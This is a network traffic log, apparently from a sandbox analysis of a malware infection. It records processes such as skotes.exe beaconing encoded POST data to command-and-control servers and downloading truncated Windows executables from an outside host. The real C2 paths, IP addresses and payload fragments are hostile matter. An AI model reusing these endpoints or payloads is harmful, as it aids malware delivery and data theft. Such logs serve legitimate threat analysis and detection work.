Dec 8, 2024 19:53:43.257350922 CET	1072	OUT	Data Raw: 54 5c 43 5c 5f 58 55 51 5c 5e 5b 53 52 5b 50 5e 56 58 54 59 50 5e 54 48 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: T\C\_XUQ\^[SR[P^VXTYP^THSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&X?<!'_ 68]</0!*17Y$+3\9,A<+%'F.#]-
Dec 8, 2024 19:53:44.229253054 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:44.485826969 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49871	185.215.113.16	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:43.906219006 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 8, 2024 19:53:45.284411907 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:44 GMT Content-Type: application/octet-stream Content-Length: 1806336 Last-Modified: Sun, 08 Dec 2024 18:43:37 GMT Connection: keep-alive ETag: "6755e8d9-1b9000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 28 01 00 00 00 00 00 00 00 69 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 69 00 00 04 00 00 9f 51 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds\|Fir^m[gmKbgdwwEeRichdPELdTg(i@0iQ@M$a$$ $h@.rsrc$x@.idata $z@ @*$\|@ykpsajjhO~@lvskadyvhh@.taggant0i"n@
Dec 8, 2024 19:53:45.284446001 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:53:45.284456015 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:53:45.284533978 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 19:53:45.284544945 CET	1236	IN	Data Raw: b0 3c 55 3d f6 84 39 9a b4 71 f8 20 c0 b9 95 77 71 9d d1 81 f5 c1 8a b1 8d b9 59 5c 91 3d 82 88 85 03 8a 9f 75 0b 72 77 ba 67 9e fb d4 db 93 ad dd d9 a1 a1 d9 49 91 6d c1 b9 bd ca 47 aa c9 da b1 b5 b5 c9 99 3f 82 a1 ae 91 8d 49 89 99 d1 a2 73 da Data Ascii: <U=9q wqY\=urwgImG?Is-bc`P{\|ht3}r~}\$1`p<Y%]r8m1QV%jMD[:REHW\|9A}9}k<PBIm%
Dec 8, 2024 19:53:45.284557104 CET	1236	IN	Data Raw: 83 e1 93 e5 90 c9 7d 9a b0 ba 4e 4e 0d 86 1c 32 e5 a1 15 ea 7f d9 e6 b2 26 e0 b6 15 81 a9 42 d2 22 63 d0 ec 69 60 f2 70 d2 6c b9 1f 3e 68 d1 7d 8a 2c d1 08 49 88 36 71 66 24 cc b7 de bb a3 30 2a 72 94 01 ea 50 d0 5c e1 4a 93 28 c2 59 d1 3e 01 c0 Data Ascii: }NN2&B"ci`pl>h},I6qf$0*rP\J(Y>,;~eu{5"#nKt<=V@Oq$clpgW5vQ>,:'r;$6wX$q-0h9N+'cPvk9~9,U
Dec 8, 2024 19:53:45.284568071 CET	1236	IN	Data Raw: af 74 89 3d 84 41 b9 09 ea b3 cb aa 80 a2 18 b7 83 1d e9 21 b1 52 01 a6 bf 83 41 aa 35 b9 b5 19 ba e3 dc 1b 29 71 29 ab 3d 3d b8 a1 ed 7e 0d 62 6b d7 4b a2 69 a1 65 8d e0 ad 46 a6 4f fd e1 99 a7 99 e3 ad 1d 52 b1 26 84 fb a1 81 83 b1 a9 3d 8e 3a Data Ascii: t=A!RA5)q)==~bkKieFOR&=:<IUi!R=Qw-i:9=EM9yu~Y!g0Q}5}u=izk;QO-4:1J@bPq%q)6
Dec 8, 2024 19:53:45.284683943 CET	1236	IN	Data Raw: 69 8c e3 86 0f 95 f1 34 e9 20 d2 a5 0e 40 ee 6e c1 af e9 5d e9 32 8f be 68 51 d1 ab f1 7e 79 b1 cb 4c 38 3c 82 b2 99 a2 15 3d 98 ad 88 63 88 ad 19 af b8 f5 69 a9 4e 29 ae 2d 71 91 51 af 97 c5 80 11 4d 92 a3 6c d1 a1 8c 26 b2 57 c1 6d 88 99 15 83 Data Ascii: i4 @n]2hQ~yL8<=ciN)-qQMl&WmuUi=z$PIx}1}ht5!!9%}VQy5*9uNjiViw=~mqY1/(1;~`1}A1:)KS=S
Dec 8, 2024 19:53:45.284694910 CET	1236	IN	Data Raw: 55 ba 18 33 80 6e e8 ad b5 17 d6 ab 81 85 95 15 ea 79 ba 6f 42 b9 b1 85 05 8d e3 9a 15 ae b0 3c e8 81 e3 a9 c1 3d 22 36 aa b4 90 be e5 61 dc ab 10 b9 dd 2f e8 c6 cf 3c 29 3e 6b 49 67 aa 81 60 11 aa 94 dd 7f 26 5a 3e 84 39 92 94 ed 2d 0c ab e9 31 Data Ascii: U3nyoB<="6a/<)>kIg`&Z>9-1!=X`R!2#1"i1=ZPCa0O<opxR/eywJ(Bj3w=ExW=Ui@Mkh;Ux6L"1jVhA:0B
Dec 8, 2024 19:53:45.284724951 CET	1236	IN	Data Raw: e5 af e9 3d f6 c5 4e 7e 73 c3 32 43 89 2d e1 77 fd b2 7d 2f 80 d6 d8 87 6b 1d 56 ab 21 a3 01 37 8b f0 d8 22 2e 05 99 aa d1 36 d6 3b a3 ae e3 d1 30 c2 c7 79 45 3d ae e5 8f 6d 54 77 06 a3 e3 dd 80 d5 d1 d1 10 83 64 b1 7e 31 2f 39 84 b9 8c 31 96 36 Data Ascii: =N~s2C-w}/kV!7".6;0yE=mTwd~1/916QDR.>i~s}==}vtuwO}9aes!:$Ux@=-%Rs=<=Y&]=RrfRRfH*M
Dec 8, 2024 19:53:45.405497074 CET	1236	IN	Data Raw: 91 bb 73 ec 4b 6a de 61 7d f3 4b 68 a7 69 51 76 c0 0d 8e a3 8d 6f 22 d3 e7 97 da fd 04 8f b7 6d 6c a8 e5 6b ec d7 b8 b4 b4 4f c8 83 4b ef 8a d3 80 d2 b9 ef b9 a7 75 e9 c1 2f b9 9d 84 3e de 31 9e dd 45 67 eb 82 11 05 6a 20 25 7d 25 9b 75 21 66 ba Data Ascii: sKja}KhiQvo"mlkOKu/>1Egj %}%u!fiJ0P$<de;5fpc]%Q+v-rqg@/Ytg~%Nv]{*OE2?H6MrU?f\Q[,+&3?RgLnBjkX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49872	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:44.739041090 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:45.097629070 CET	1072	OUT	Data Raw: 54 5f 46 5f 5f 5a 50 52 5c 5e 5b 53 52 54 50 5a 56 5b 54 59 50 5d 54 45 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: T_F__ZPR\^[SRTPZV[TYP]TESVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&(9$)#["S#(/?#)$[&700R</.,#(18%'F.#]-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49878	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:45.724589109 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:46.105509996 CET	1788	OUT	Data Raw: 51 59 46 5a 5f 5e 50 57 5c 5e 5b 53 52 5d 50 59 56 59 54 5d 50 54 54 41 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: QYFZ_^PW\^[SR]PYVYT]PTTASVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&X?2]&*("<+3 :Z%,/'8T(=#Z.Y8@=2 %,'F.#]-"
Dec 8, 2024 19:53:47.052921057 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:47.292179108 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 13 39 58 22 02 30 0e 22 39 22 08 3b 01 26 12 3f 2e 03 04 3a 5e 29 1a 3c 55 3f 58 28 05 27 07 2b 00 0d 01 33 20 2e 19 35 1c 2b 12 25 24 20 5b 0d 1e 24 0a 23 1d 38 0d 28 1d 3e 00 2f 51 36 13 32 3f 36 17 22 03 24 0b 25 28 3e 01 28 22 39 50 29 33 23 0f 33 39 34 58 24 04 38 03 3f 3b 21 57 0c 11 22 0e 31 30 27 0e 35 32 24 58 26 1c 34 0e 36 25 22 50 3e 0d 2a 5c 27 06 20 02 2d 28 39 1e 22 1f 34 11 2d 38 39 05 35 3d 3c 0b 29 13 2e 52 23 01 2e 52 00 3f 5b 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 989X"0"9";&?.:^)<U?X('+3 .5+%$ [$#8(>/Q62?6"$%(>("9P)3#394X$8?;!W"10'52$X&46%"P>*\' -(9"4-895=<).R#.R?[O0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49879	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:45.844624043 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:46.193075895 CET	1072	OUT	Data Raw: 54 58 43 58 5f 56 50 52 5c 5e 5b 53 52 55 50 5c 56 5d 54 5e 50 54 54 47 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: TXCX_VPR\^[SRUP\V]T^PTTGSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%+13<"57+Y/ $^2_04;?>3]-<(4&,'F.#]-
Dec 8, 2024 19:53:47.179147005 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:47.421128035 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49886	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:47.855901003 CET	387	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue
Dec 8, 2024 19:53:48.207007885 CET	1072	OUT	Data Raw: 54 5f 43 5c 5a 5a 50 57 5c 5e 5b 53 52 5d 50 50 56 5c 54 58 50 54 54 45 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: T_C\ZZPW\^[SR]PPV\TXPTTESVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%+<)3*<5$\??!:4[2,40$R<=#]: A<(%,'F.#]-"
Dec 8, 2024 19:53:49.196808100 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:49.432941914 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49892	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:49.733477116 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:50.082876921 CET	1072	OUT	Data Raw: 51 58 43 5d 5f 5f 55 50 5c 5e 5b 53 52 5a 50 5e 56 5a 54 5d 50 5f 54 40 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: QXC]__UP\^[SRZP^VZT]P_T@SVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX&+*37"S7?4 [2,^$$T). -/'=1?Z1'F.#]->
Dec 8, 2024 19:53:51.064683914 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:51.305408001 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 30 5b 40 56 0d 0a 30 0d 0a 0d 0a Data Ascii: 40[@V0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49896	185.215.113.43	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:50.876609087 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 33 32 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1013250001&unit=246122658369
Dec 8, 2024 19:53:52.224555016 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49900	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:51.568296909 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:52.018753052 CET	1072	OUT	Data Raw: 54 5b 43 53 5a 59 50 50 5c 5e 5b 53 52 5e 50 5e 56 5b 54 58 50 55 54 41 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: T[CSZYPP\^[SR^P^V[TXPUTASVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%+1$! +<;#'<+'$<7-/,B?11<'F.#]-.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49903	77.73.39.158	80	3060	C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:52.471250057 CET	411	OUT	POST /4TempjsApi/dleLocalrequestAsync/Line/5pythonDefaultasync/windowsTestPipe/Mariadb/7/ProviderpipehttplowAuthBigloaddleLocalcdndownloads.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 77.73.39.158 Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 8, 2024 19:53:52.816860914 CET	1788	OUT	Data Raw: 54 5c 46 5e 5f 5e 50 50 5c 5e 5b 53 52 5e 50 59 56 5e 54 5c 50 5d 54 47 53 56 41 5b 56 5d 5a 52 47 5b 53 58 5a 52 51 50 5a 57 50 57 58 52 5a 54 5b 52 5e 47 5e 52 51 51 53 56 57 53 54 52 55 5b 58 5e 59 5e 5f 5b 51 58 59 5a 43 59 41 53 5a 51 55 52 Data Ascii: T\F^_^PP\^[SR^PYV^T\P]TGSVA[V]ZRG[SXZRQPZWPWXRZT[R^G^RQQSVWSTRU[X^Y^_[QXYZCYASZQURVU_\[^ZP\[B[[XZ[^P[V^Q\_G^[RA__@TXTVX^Z_Y_P_F[_WVTU_\^_YUPW\TSYZWSUWXC_YA_ZVQUYW[FSXVW[F_\[USQ_PZP[\ZX%<"_':?[!%?7<_&?('''<3.(!%,'F.#]-.
Dec 8, 2024 19:53:53.800976038 CET	25	IN	HTTP/1.1 100 Continue
Dec 8, 2024 19:53:54.025290966 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 08 Dec 2024 18:53:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 02 13 3a 00 36 02 33 54 21 29 2e 0f 2f 3b 2a 58 28 10 3e 14 2d 16 2d 1c 28 20 34 07 2b 3c 02 10 3c 2e 34 17 33 30 36 53 21 21 30 0d 31 34 20 5b 0d 1e 24 07 37 33 37 52 28 0d 31 5a 3b 51 2e 5d 25 06 36 5f 36 03 27 1a 33 3b 3d 1b 28 22 26 08 29 30 30 51 33 29 34 5f 24 3e 2f 5d 3c 11 21 57 0c 11 21 13 26 33 37 08 21 0b 28 10 27 21 24 0b 22 25 00 55 28 30 25 00 33 01 28 07 39 06 39 13 21 32 33 0c 2c 38 0c 16 21 13 20 0b 3e 39 2e 52 23 01 2e 52 00 3f 5b 4f 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:63T!)./;*X(>--( 4+<<.4306S!!014 [$737R(1Z;Q.]%6_6'3;=("&)00Q3)4_$>/]<!W!&37!('!$"%U(0%3(99!23,8! >9.R#.R?[O0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49904	185.215.113.16	80	7716	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 19:53:52.681919098 CET	55	OUT	GET /well/random.exe HTTP/1.1 Host: 185.215.113.16
Dec 8, 2024 19:53:54.004386902 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 18:53:53 GMT Content-Type: application/octet-stream Content-Length: 971264 Last-Modified: Sun, 08 Dec 2024 18:41:42 GMT Connection: keep-alive ETag: "6755e866-ed200" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5e e8 55 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 22 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL^Ug""w@0v@@@d\|@fu4@.text `.rdata@@.datalpH@.rsrcf@h@@.relocuv\@B
Dec 8, 2024 19:53:54.004411936 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
